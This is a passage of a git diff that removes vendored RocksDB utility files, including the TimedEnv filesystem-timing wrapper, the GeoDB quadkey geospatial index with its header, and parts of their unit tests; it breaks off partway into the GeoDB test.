-  ASSERT_OK(rand_file->Read(0, 5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(rand_file->Read(10, 100, &result, scratch));  // Read "d".
-  ASSERT_EQ(0, result.compare("d"));
-
-  // Too high offset.
-  ASSERT_TRUE(!rand_file->Read(1000, 5, &result, scratch).ok());
-}
-
-TEST_F(EnvMirrorTest, Locks) {
-  FileLock* lock;
-
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(env_->LockFile("some file", &lock));
-  ASSERT_OK(env_->UnlockFile(lock));
-}
-
-TEST_F(EnvMirrorTest, Misc) {
-  std::string test_dir;
-  ASSERT_OK(env_->GetTestDirectory(&test_dir));
-  ASSERT_TRUE(!test_dir.empty());
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile("/a/b", &writable_file, soptions_));
-
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(writable_file->Sync());
-  ASSERT_OK(writable_file->Flush());
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-}
-
-TEST_F(EnvMirrorTest, LargeWrite) {
-  const size_t kWriteSize = 300 * 1024;
-  char* scratch = new char[kWriteSize * 2];
-
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, static_cast<char>(i));
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("foo"));
-  ASSERT_OK(writable_file->Append(write_data));
-  writable_file.reset();
-
-  unique_ptr<SequentialFile> seq_file;
-  Slice result;
-  ASSERT_OK(env_->NewSequentialFile("/dir/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(3, &result, scratch));  // Read "foo".
-  ASSERT_EQ(0, result.compare("foo"));
-
-  size_t read = 0;
-  std::string read_data;
-  while (read < kWriteSize) {
-    ASSERT_OK(seq_file->Read(kWriteSize - read, &result, scratch));
-    read_data.append(result.data(), result.size());
-    read += result.size();
-  }
-  ASSERT_TRUE(write_data == read_data);
-  delete[] scratch;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as EnvMirror is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/env_timed.cc b/thirdparty/rocksdb/utilities/env_timed.cc
deleted file mode 100644
index 2afa0e0..0000000
--- a/thirdparty/rocksdb/utilities/env_timed.cc
+++ /dev/null
@@ -1,148 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-// An environment that measures function call times for filesystem
-// operations, reporting results to variables in PerfContext.
-class TimedEnv : public EnvWrapper {
- public:
-  explicit TimedEnv(Env* base_env) : EnvWrapper(base_env) {}
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_new_sequential_file_nanos);
-    return EnvWrapper::NewSequentialFile(fname, result, options);
-  }
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_new_random_access_file_nanos);
-    return EnvWrapper::NewRandomAccessFile(fname, result, options);
-  }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_new_writable_file_nanos);
-    return EnvWrapper::NewWritableFile(fname, result, options);
-  }
-
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_reuse_writable_file_nanos);
-    return EnvWrapper::ReuseWritableFile(fname, old_fname, result, options);
-  }
-
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) override {
-    PERF_TIMER_GUARD(env_new_random_rw_file_nanos);
-    return EnvWrapper::NewRandomRWFile(fname, result, options);
-  }
-
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    PERF_TIMER_GUARD(env_new_directory_nanos);
-    return EnvWrapper::NewDirectory(name, result);
-  }
-
-  virtual Status FileExists(const std::string& fname) override {
-    PERF_TIMER_GUARD(env_file_exists_nanos);
-    return EnvWrapper::FileExists(fname);
-  }
-
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override {
-    PERF_TIMER_GUARD(env_get_children_nanos);
-    return EnvWrapper::GetChildren(dir, result);
-  }
-
-  virtual Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<FileAttributes>* result) override {
-    PERF_TIMER_GUARD(env_get_children_file_attributes_nanos);
-    return EnvWrapper::GetChildrenFileAttributes(dir, result);
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    PERF_TIMER_GUARD(env_delete_file_nanos);
-    return EnvWrapper::DeleteFile(fname);
-  }
-
-  virtual Status CreateDir(const std::string& dirname) override {
-    PERF_TIMER_GUARD(env_create_dir_nanos);
-    return EnvWrapper::CreateDir(dirname);
-  }
-
-  virtual Status CreateDirIfMissing(const std::string& dirname) override {
-    PERF_TIMER_GUARD(env_create_dir_if_missing_nanos);
-    return EnvWrapper::CreateDirIfMissing(dirname);
-  }
-
-  virtual Status DeleteDir(const std::string& dirname) override {
-    PERF_TIMER_GUARD(env_delete_dir_nanos);
-    return EnvWrapper::DeleteDir(dirname);
-  }
-
-  virtual Status GetFileSize(const std::string& fname,
-                             uint64_t* file_size) override {
-    PERF_TIMER_GUARD(env_get_file_size_nanos);
-    return EnvWrapper::GetFileSize(fname, file_size);
-  }
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime) override {
-    PERF_TIMER_GUARD(env_get_file_modification_time_nanos);
-    return EnvWrapper::GetFileModificationTime(fname, file_mtime);
-  }
-
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& dst) override {
-    PERF_TIMER_GUARD(env_rename_file_nanos);
-    return EnvWrapper::RenameFile(src, dst);
-  }
-
-  virtual Status LinkFile(const std::string& src,
-                          const std::string& dst) override {
-    PERF_TIMER_GUARD(env_link_file_nanos);
-    return EnvWrapper::LinkFile(src, dst);
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock) override {
-    PERF_TIMER_GUARD(env_lock_file_nanos);
-    return EnvWrapper::LockFile(fname, lock);
-  }
-
-  virtual Status UnlockFile(FileLock* lock) override {
-    PERF_TIMER_GUARD(env_unlock_file_nanos);
-    return EnvWrapper::UnlockFile(lock);
-  }
-
-  virtual Status NewLogger(const std::string& fname,
-                           shared_ptr<Logger>* result) override {
-    PERF_TIMER_GUARD(env_new_logger_nanos);
-    return EnvWrapper::NewLogger(fname, result);
-  }
-};
-
-Env* NewTimedEnv(Env* base_env) { return new TimedEnv(base_env); }
-
-#else  // ROCKSDB_LITE
-
-Env* NewTimedEnv(Env* base_env) { return nullptr; }
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/env_timed_test.cc b/thirdparty/rocksdb/utilities/env_timed_test.cc
deleted file mode 100644
index 41d05e1..0000000
--- a/thirdparty/rocksdb/utilities/env_timed_test.cc
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/env.h"
-#include "rocksdb/perf_context.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class TimedEnvTest : public testing::Test {
-};
-
-TEST_F(TimedEnvTest, BasicTest) {
-  SetPerfLevel(PerfLevel::kEnableTime);
-  ASSERT_EQ(0, get_perf_context()->env_new_writable_file_nanos);
-
-  std::unique_ptr<Env> mem_env(NewMemEnv(Env::Default()));
-  std::unique_ptr<Env> timed_env(NewTimedEnv(mem_env.get()));
-  std::unique_ptr<WritableFile> writable_file;
-  timed_env->NewWritableFile("f", &writable_file, EnvOptions());
-
-  ASSERT_GT(get_perf_context()->env_new_writable_file_nanos, 0);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else  // ROCKSDB_LITE
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as TimedEnv is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/geodb/geodb_impl.cc b/thirdparty/rocksdb/utilities/geodb/geodb_impl.cc
deleted file mode 100644
index a574e84..0000000
--- a/thirdparty/rocksdb/utilities/geodb/geodb_impl.cc
+++ /dev/null
@@ -1,477 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/geodb/geodb_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <limits>
-#include <map>
-#include <string>
-#include <vector>
-#include "util/coding.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-
-//
-// There are two types of keys. The first type of key-values
-// maps a geo location to the set of object ids and their values.
-// Table 1
-//   key     : p + : + $quadkey + : + $id +
-//             : + $latitude + : + $longitude
-//   value  :  value of the object
-// This table can be used to find all objects that reside near
-// a specified geolocation.
-//
-// Table 2
-//   key  : 'k' + : + $id
-//   value:  $quadkey
-
-namespace rocksdb {
-
-const double GeoDBImpl::PI = 3.141592653589793;
-const double GeoDBImpl::EarthRadius = 6378137;
-const double GeoDBImpl::MinLatitude = -85.05112878;
-const double GeoDBImpl::MaxLatitude = 85.05112878;
-const double GeoDBImpl::MinLongitude = -180;
-const double GeoDBImpl::MaxLongitude = 180;
-
-GeoDBImpl::GeoDBImpl(DB* db, const GeoDBOptions& options) :
-  GeoDB(db, options), db_(db), options_(options) {
-}
-
-GeoDBImpl::~GeoDBImpl() {
-}
-
-Status GeoDBImpl::Insert(const GeoObject& obj) {
-  WriteBatch batch;
-
-  // It is possible that this id is already associated with
-  // with a different position. We first have to remove that
-  // association before we can insert the new one.
-
-  // remove existing object, if it exists
-  GeoObject old;
-  Status status = GetById(obj.id, &old);
-  if (status.ok()) {
-    assert(obj.id.compare(old.id) == 0);
-    std::string quadkey = PositionToQuad(old.position, Detail);
-    std::string key1 = MakeKey1(old.position, old.id, quadkey);
-    std::string key2 = MakeKey2(old.id);
-    batch.Delete(Slice(key1));
-    batch.Delete(Slice(key2));
-  } else if (status.IsNotFound()) {
-    // What if another thread is trying to insert the same ID concurrently?
-  } else {
-    return status;
-  }
-
-  // insert new object
-  std::string quadkey = PositionToQuad(obj.position, Detail);
-  std::string key1 = MakeKey1(obj.position, obj.id, quadkey);
-  std::string key2 = MakeKey2(obj.id);
-  batch.Put(Slice(key1), Slice(obj.value));
-  batch.Put(Slice(key2), Slice(quadkey));
-  return db_->Write(woptions_, &batch);
-}
-
-Status GeoDBImpl::GetByPosition(const GeoPosition& pos,
-                                const Slice& id,
-                                std::string* value) {
-  std::string quadkey = PositionToQuad(pos, Detail);
-  std::string key1 = MakeKey1(pos, id, quadkey);
-  return db_->Get(roptions_, Slice(key1), value);
-}
-
-Status GeoDBImpl::GetById(const Slice& id, GeoObject* object) {
-  Status status;
-  std::string quadkey;
-
-  // create an iterator so that we can get a consistent picture
-  // of the database.
-  Iterator* iter = db_->NewIterator(roptions_);
-
-  // create key for table2
-  std::string kt = MakeKey2(id);
-  Slice key2(kt);
-
-  iter->Seek(key2);
-  if (iter->Valid() && iter->status().ok()) {
-    if (iter->key().compare(key2) == 0) {
-      quadkey = iter->value().ToString();
-    }
-  }
-  if (quadkey.size() == 0) {
-    delete iter;
-    return Status::NotFound(key2);
-  }
-
-  //
-  // Seek to the quadkey + id prefix
-  //
-  std::string prefix = MakeKey1Prefix(quadkey, id);
-  iter->Seek(Slice(prefix));
-  assert(iter->Valid());
-  if (!iter->Valid() || !iter->status().ok()) {
-    delete iter;
-    return Status::NotFound();
-  }
-
-  // split the key into p + quadkey + id + lat + lon
-  Slice key = iter->key();
-  std::vector<std::string> parts = StringSplit(key.ToString(), ':');
-  assert(parts.size() == 5);
-  assert(parts[0] == "p");
-  assert(parts[1] == quadkey);
-  assert(parts[2] == id);
-
-  // fill up output parameters
-  object->position.latitude = atof(parts[3].c_str());
-  object->position.longitude = atof(parts[4].c_str());
-  object->id = id.ToString();  // this is redundant
-  object->value = iter->value().ToString();
-  delete iter;
-  return Status::OK();
-}
-
-
-Status GeoDBImpl::Remove(const Slice& id) {
-  // Read the object from the database
-  GeoObject obj;
-  Status status = GetById(id, &obj);
-  if (!status.ok()) {
-    return status;
-  }
-
-  // remove the object by atomically deleting it from both tables
-  std::string quadkey = PositionToQuad(obj.position, Detail);
-  std::string key1 = MakeKey1(obj.position, obj.id, quadkey);
-  std::string key2 = MakeKey2(obj.id);
-  WriteBatch batch;
-  batch.Delete(Slice(key1));
-  batch.Delete(Slice(key2));
-  return db_->Write(woptions_, &batch);
-}
-
-class GeoIteratorImpl : public GeoIterator {
- private:
-  std::vector<GeoObject> values_;
-  std::vector<GeoObject>::iterator iter_;
- public:
-  explicit GeoIteratorImpl(std::vector<GeoObject> values)
-    : values_(std::move(values)) {
-    iter_ = values_.begin();
-  }
-  virtual void Next() override;
-  virtual bool Valid() const override;
-  virtual const GeoObject& geo_object() override;
-  virtual Status status() const override;
-};
-
-class GeoErrorIterator : public GeoIterator {
- private:
-  Status status_;
- public:
-  explicit GeoErrorIterator(Status s) : status_(s) {}
-  virtual void Next() override {};
-  virtual bool Valid() const override { return false; }
-  virtual const GeoObject& geo_object() override {
-    GeoObject* g = new GeoObject();
-    return *g;
-  }
-  virtual Status status() const override { return status_; }
-};
-
-void GeoIteratorImpl::Next() {
-  assert(Valid());
-  iter_++;
-}
-
-bool GeoIteratorImpl::Valid() const {
-  return iter_ != values_.end();
-}
-
-const GeoObject& GeoIteratorImpl::geo_object() {
-  assert(Valid());
-  return *iter_;
-}
-
-Status GeoIteratorImpl::status() const {
-  return Status::OK();
-}
-
-GeoIterator* GeoDBImpl::SearchRadial(const GeoPosition& pos,
-  double radius,
-  int number_of_values) {
-  std::vector<GeoObject> values;
-
-  // Gather all bounding quadkeys
-  std::vector<std::string> qids;
-  Status s = searchQuadIds(pos, radius, &qids);
-  if (!s.ok()) {
-    return new GeoErrorIterator(s);
-  }
-
-  // create an iterator
-  Iterator* iter = db_->NewIterator(ReadOptions());
-
-  // Process each prospective quadkey
-  for (std::string qid : qids) {
-    // The user is interested in only these many objects.
-    if (number_of_values == 0) {
-      break;
-    }
-
-    // convert quadkey to db key prefix
-    std::string dbkey = MakeQuadKeyPrefix(qid);
-
-    for (iter->Seek(dbkey);
-         number_of_values > 0 && iter->Valid() && iter->status().ok();
-         iter->Next()) {
-      // split the key into p + quadkey + id + lat + lon
-      Slice key = iter->key();
-      std::vector<std::string> parts = StringSplit(key.ToString(), ':');
-      assert(parts.size() == 5);
-      assert(parts[0] == "p");
-      std::string* quadkey = &parts[1];
-
-      // If the key we are looking for is a prefix of the key
-      // we found from the database, then this is one of the keys
-      // we are looking for.
-      auto res = std::mismatch(qid.begin(), qid.end(), quadkey->begin());
-      if (res.first == qid.end()) {
-        GeoPosition obj_pos(atof(parts[3].c_str()), atof(parts[4].c_str()));
-        GeoObject obj(obj_pos, parts[4], iter->value().ToString());
-        values.push_back(obj);
-        number_of_values--;
-      } else {
-        break;
-      }
-    }
-  }
-  delete iter;
-  return new GeoIteratorImpl(std::move(values));
-}
-
-std::string GeoDBImpl::MakeKey1(const GeoPosition& pos, Slice id,
-                                std::string quadkey) {
-  std::string lat = rocksdb::ToString(pos.latitude);
-  std::string lon = rocksdb::ToString(pos.longitude);
-  std::string key = "p:";
-  key.reserve(5 + quadkey.size() + id.size() + lat.size() + lon.size());
-  key.append(quadkey);
-  key.append(":");
-  key.append(id.ToString());
-  key.append(":");
-  key.append(lat);
-  key.append(":");
-  key.append(lon);
-  return key;
-}
-
-std::string GeoDBImpl::MakeKey2(Slice id) {
-  std::string key = "k:";
-  key.append(id.ToString());
-  return key;
-}
-
-std::string GeoDBImpl::MakeKey1Prefix(std::string quadkey,
-                                      Slice id) {
-  std::string key = "p:";
-  key.reserve(3 + quadkey.size() + id.size());
-  key.append(quadkey);
-  key.append(":");
-  key.append(id.ToString());
-  return key;
-}
-
-std::string GeoDBImpl::MakeQuadKeyPrefix(std::string quadkey) {
-  std::string key = "p:";
-  key.append(quadkey);
-  return key;
-}
-
-// convert degrees to radians
-double GeoDBImpl::radians(double x) {
-  return (x * PI) / 180;
-}
-
-// convert radians to degrees
-double GeoDBImpl::degrees(double x) {
-  return (x * 180) / PI;
-}
-
-// convert a gps location to quad coordinate
-std::string GeoDBImpl::PositionToQuad(const GeoPosition& pos,
-                                      int levelOfDetail) {
-  Pixel p = PositionToPixel(pos, levelOfDetail);
-  Tile tile = PixelToTile(p);
-  return TileToQuadKey(tile, levelOfDetail);
-}
-
-GeoPosition GeoDBImpl::displaceLatLon(double lat, double lon,
-                                      double deltay, double deltax) {
-  double dLat = deltay / EarthRadius;
-  double dLon = deltax / (EarthRadius * cos(radians(lat)));
-  return GeoPosition(lat + degrees(dLat),
-                     lon + degrees(dLon));
-}
-
-//
-// Return the distance between two positions on the earth
-//
-double GeoDBImpl::distance(double lat1, double lon1,
-                           double lat2, double lon2) {
-  double lon = radians(lon2 - lon1);
-  double lat = radians(lat2 - lat1);
-
-  double a = (sin(lat / 2) * sin(lat / 2)) +
-              cos(radians(lat1)) * cos(radians(lat2)) *
-              (sin(lon / 2) * sin(lon / 2));
-  double angle = 2 * atan2(sqrt(a), sqrt(1 - a));
-  return angle * EarthRadius;
-}
-
-//
-// Returns all the quadkeys inside the search range
-//
-Status GeoDBImpl::searchQuadIds(const GeoPosition& position,
-                                double radius,
-                                std::vector<std::string>* quadKeys) {
-  // get the outline of the search square
-  GeoPosition topLeftPos = boundingTopLeft(position, radius);
-  GeoPosition bottomRightPos = boundingBottomRight(position, radius);
-
-  Pixel topLeft =  PositionToPixel(topLeftPos, Detail);
-  Pixel bottomRight =  PositionToPixel(bottomRightPos, Detail);
-
-  // how many level of details to look for
-  int numberOfTilesAtMaxDepth = static_cast<int>(std::floor((bottomRight.x - topLeft.x) / 256));
-  int zoomLevelsToRise = static_cast<int>(std::floor(std::log(numberOfTilesAtMaxDepth) / std::log(2)));
-  zoomLevelsToRise++;
-  int levels = std::max(0, Detail - zoomLevelsToRise);
-
-  quadKeys->push_back(PositionToQuad(GeoPosition(topLeftPos.latitude,
-                                                 topLeftPos.longitude),
-                                     levels));
-  quadKeys->push_back(PositionToQuad(GeoPosition(topLeftPos.latitude,
-                                                 bottomRightPos.longitude),
-                                     levels));
-  quadKeys->push_back(PositionToQuad(GeoPosition(bottomRightPos.latitude,
-                                                 topLeftPos.longitude),
-                                     levels));
-  quadKeys->push_back(PositionToQuad(GeoPosition(bottomRightPos.latitude,
-                                                 bottomRightPos.longitude),
-                                     levels));
-  return Status::OK();
-}
-
-// Determines the ground resolution (in meters per pixel) at a specified
-// latitude and level of detail.
-// Latitude (in degrees) at which to measure the ground resolution.
-// Level of detail, from 1 (lowest detail) to 23 (highest detail).
-// Returns the ground resolution, in meters per pixel.
-double GeoDBImpl::GroundResolution(double latitude, int levelOfDetail) {
-  latitude = clip(latitude, MinLatitude, MaxLatitude);
-  return cos(latitude * PI / 180) * 2 * PI * EarthRadius /
-         MapSize(levelOfDetail);
-}
-
-// Converts a point from latitude/longitude WGS-84 coordinates (in degrees)
-// into pixel XY coordinates at a specified level of detail.
-GeoDBImpl::Pixel GeoDBImpl::PositionToPixel(const GeoPosition& pos,
-                                            int levelOfDetail) {
-  double latitude = clip(pos.latitude, MinLatitude, MaxLatitude);
-  double x = (pos.longitude + 180) / 360;
-  double sinLatitude = sin(latitude * PI / 180);
-  double y = 0.5 - std::log((1 + sinLatitude) / (1 - sinLatitude)) / (4 * PI);
-  double mapSize = MapSize(levelOfDetail);
-  double X = std::floor(clip(x * mapSize + 0.5, 0, mapSize - 1));
-  double Y = std::floor(clip(y * mapSize + 0.5, 0, mapSize - 1));
-  return Pixel((unsigned int)X, (unsigned int)Y);
-}
-
-GeoPosition GeoDBImpl::PixelToPosition(const Pixel& pixel, int levelOfDetail) {
-  double mapSize = MapSize(levelOfDetail);
-  double x = (clip(pixel.x, 0, mapSize - 1) / mapSize) - 0.5;
-  double y = 0.5 - (clip(pixel.y, 0, mapSize - 1) / mapSize);
-  double latitude = 90 - 360 * atan(exp(-y * 2 * PI)) / PI;
-  double longitude = 360 * x;
-  return GeoPosition(latitude, longitude);
-}
-
-// Converts a Pixel to a Tile
-GeoDBImpl::Tile GeoDBImpl::PixelToTile(const Pixel& pixel) {
-  unsigned int tileX = static_cast<unsigned int>(std::floor(pixel.x / 256));
-  unsigned int tileY = static_cast<unsigned int>(std::floor(pixel.y / 256));
-  return Tile(tileX, tileY);
-}
-
-GeoDBImpl::Pixel GeoDBImpl::TileToPixel(const Tile& tile) {
-  unsigned int pixelX = tile.x * 256;
-  unsigned int pixelY = tile.y * 256;
-  return Pixel(pixelX, pixelY);
-}
-
-// Convert a Tile to a quadkey
-std::string GeoDBImpl::TileToQuadKey(const Tile& tile, int levelOfDetail) {
-  std::stringstream quadKey;
-  for (int i = levelOfDetail; i > 0; i--) {
-    char digit = '0';
-    int mask = 1 << (i - 1);
-    if ((tile.x & mask) != 0) {
-      digit++;
-    }
-    if ((tile.y & mask) != 0) {
-      digit++;
-      digit++;
-    }
-    quadKey << digit;
-  }
-  return quadKey.str();
-}
-
-//
-// Convert a quadkey to a tile and its level of detail
-//
-void GeoDBImpl::QuadKeyToTile(std::string quadkey, Tile* tile,
-                              int* levelOfDetail) {
-  tile->x = tile->y = 0;
-  *levelOfDetail = static_cast<int>(quadkey.size());
-  const char* key = reinterpret_cast<const char*>(quadkey.c_str());
-  for (int i = *levelOfDetail; i > 0; i--) {
-    int mask = 1 << (i - 1);
-    switch (key[*levelOfDetail - i]) {
-      case '0':
-        break;
-
-      case '1':
-        tile->x |= mask;
-        break;
-
-      case '2':
-        tile->y |= mask;
-        break;
-
-      case '3':
-        tile->x |= mask;
-        tile->y |= mask;
-        break;
-
-      default:
-        std::stringstream msg;
-        msg << quadkey;
-        msg << " Invalid QuadKey.";
-        throw std::runtime_error(msg.str());
-    }
-  }
-}
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/geodb/geodb_impl.h b/thirdparty/rocksdb/utilities/geodb/geodb_impl.h
deleted file mode 100644
index 6b15f54..0000000
--- a/thirdparty/rocksdb/utilities/geodb/geodb_impl.h
+++ /dev/null
@@ -1,185 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#pragma once
-#include <algorithm>
-#include <cmath>
-#include <string>
-#include <sstream>
-#include <stdexcept>
-#include <vector>
-
-#include "rocksdb/utilities/geo_db.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// A specific implementation of GeoDB
-
-class GeoDBImpl : public GeoDB {
- public:
-  GeoDBImpl(DB* db, const GeoDBOptions& options);
-  ~GeoDBImpl();
-
-  // Associate the GPS location with the identified by 'id'. The value
-  // is a blob that is associated with this object.
-  virtual Status Insert(const GeoObject& object) override;
-
-  // Retrieve the value of the object located at the specified GPS
-  // location and is identified by the 'id'.
-  virtual Status GetByPosition(const GeoPosition& pos, const Slice& id,
-                               std::string* value) override;
-
-  // Retrieve the value of the object identified by the 'id'. This method
-  // could be potentially slower than GetByPosition
-  virtual Status GetById(const Slice& id, GeoObject* object) override;
-
-  // Delete the specified object
-  virtual Status Remove(const Slice& id) override;
-
-  // Returns a list of all items within a circular radius from the
-  // specified gps location
-  virtual GeoIterator* SearchRadial(const GeoPosition& pos, double radius,
-                                    int number_of_values) override;
-
- private:
-  DB* db_;
-  const GeoDBOptions options_;
-  const WriteOptions woptions_;
-  const ReadOptions roptions_;
-
-  // MSVC requires the definition for this static const to be in .CC file
-  // The value of PI
-  static const double PI;
-
-  // convert degrees to radians
-  static double radians(double x);
-
-  // convert radians to degrees
-  static double degrees(double x);
-
-  // A pixel class that captures X and Y coordinates
-  class Pixel {
-   public:
-    unsigned int x;
-    unsigned int y;
-    Pixel(unsigned int a, unsigned int b) :
-     x(a), y(b) {
-    }
-  };
-
-  // A Tile in the geoid
-  class Tile {
-   public:
-    unsigned int x;
-    unsigned int y;
-    Tile(unsigned int a, unsigned int b) :
-     x(a), y(b) {
-    }
-  };
-
-  // convert a gps location to quad coordinate
-  static std::string PositionToQuad(const GeoPosition& pos, int levelOfDetail);
-
-  // arbitrary constant use for WGS84 via
-  // http://en.wikipedia.org/wiki/World_Geodetic_System
-  // http://mathforum.org/library/drmath/view/51832.html
-  // http://msdn.microsoft.com/en-us/library/bb259689.aspx
-  // http://www.tuicool.com/articles/NBrE73
-  //
-  const int Detail = 23;
-  // MSVC requires the definition for this static const to be in .CC file
-  static const double EarthRadius;
-  static const double MinLatitude;
-  static const double MaxLatitude;
-  static const double MinLongitude;
-  static const double MaxLongitude;
-
-  // clips a number to the specified minimum and maximum values.
-  static double clip(double n, double minValue, double maxValue) {
-    return fmin(fmax(n, minValue), maxValue);
-  }
-
-  // Determines the map width and height (in pixels) at a specified level
-  // of detail, from 1 (lowest detail) to 23 (highest detail).
-  // Returns the map width and height in pixels.
-  static unsigned int MapSize(int levelOfDetail) {
-    return (unsigned int)(256 << levelOfDetail);
-  }
-
-  // Determines the ground resolution (in meters per pixel) at a specified
-  // latitude and level of detail.
-  // Latitude (in degrees) at which to measure the ground resolution.
-  // Level of detail, from 1 (lowest detail) to 23 (highest detail).
-  // Returns the ground resolution, in meters per pixel.
-  static double GroundResolution(double latitude, int levelOfDetail);
-
-  // Converts a point from latitude/longitude WGS-84 coordinates (in degrees)
-  // into pixel XY coordinates at a specified level of detail.
-  static Pixel PositionToPixel(const GeoPosition& pos, int levelOfDetail);
-
-  static GeoPosition PixelToPosition(const Pixel& pixel, int levelOfDetail);
-
-  // Converts a Pixel to a Tile
-  static Tile PixelToTile(const Pixel& pixel);
-
-  static Pixel TileToPixel(const Tile& tile);
-
-  // Convert a Tile to a quadkey
-  static std::string TileToQuadKey(const Tile& tile, int levelOfDetail);
-
-  // Convert a quadkey to a tile and its level of detail
-  static void QuadKeyToTile(std::string quadkey, Tile* tile,
-                            int *levelOfDetail);
-
-  // Return the distance between two positions on the earth
-  static double distance(double lat1, double lon1,
-                         double lat2, double lon2);
-  static GeoPosition displaceLatLon(double lat, double lon,
-                                    double deltay, double deltax);
-
-  //
-  // Returns the top left position after applying the delta to
-  // the specified position
-  //
-  static GeoPosition boundingTopLeft(const GeoPosition& in, double radius) {
-    return displaceLatLon(in.latitude, in.longitude, -radius, -radius);
-  }
-
-  //
-  // Returns the bottom right position after applying the delta to
-  // the specified position
-  static GeoPosition boundingBottomRight(const GeoPosition& in,
-                                         double radius) {
-    return displaceLatLon(in.latitude, in.longitude, radius, radius);
-  }
-
-  //
-  // Get all quadkeys within a radius of a specified position
-  //
-  Status searchQuadIds(const GeoPosition& position,
-                       double radius,
-                       std::vector<std::string>* quadKeys);
-
-  //
-  // Create keys for accessing rocksdb table(s)
-  //
-  static std::string MakeKey1(const GeoPosition& pos,
-                              Slice id,
-                              std::string quadkey);
-  static std::string MakeKey2(Slice id);
-  static std::string MakeKey1Prefix(std::string quadkey,
-                                    Slice id);
-  static std::string MakeQuadKeyPrefix(std::string quadkey);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/geodb/geodb_test.cc b/thirdparty/rocksdb/utilities/geodb/geodb_test.cc
deleted file mode 100644
index dcdb982..0000000
--- a/thirdparty/rocksdb/utilities/geodb/geodb_test.cc
+++ /dev/null
@@ -1,140 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-#include "utilities/geodb/geodb_impl.h"
-
-#include <cctype>
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class GeoDBTest : public testing::Test {
- public:
-  static const std::string kDefaultDbName;
-  static Options options;
-  DB* db;
-  GeoDB* geodb;
-
-  GeoDBTest() {
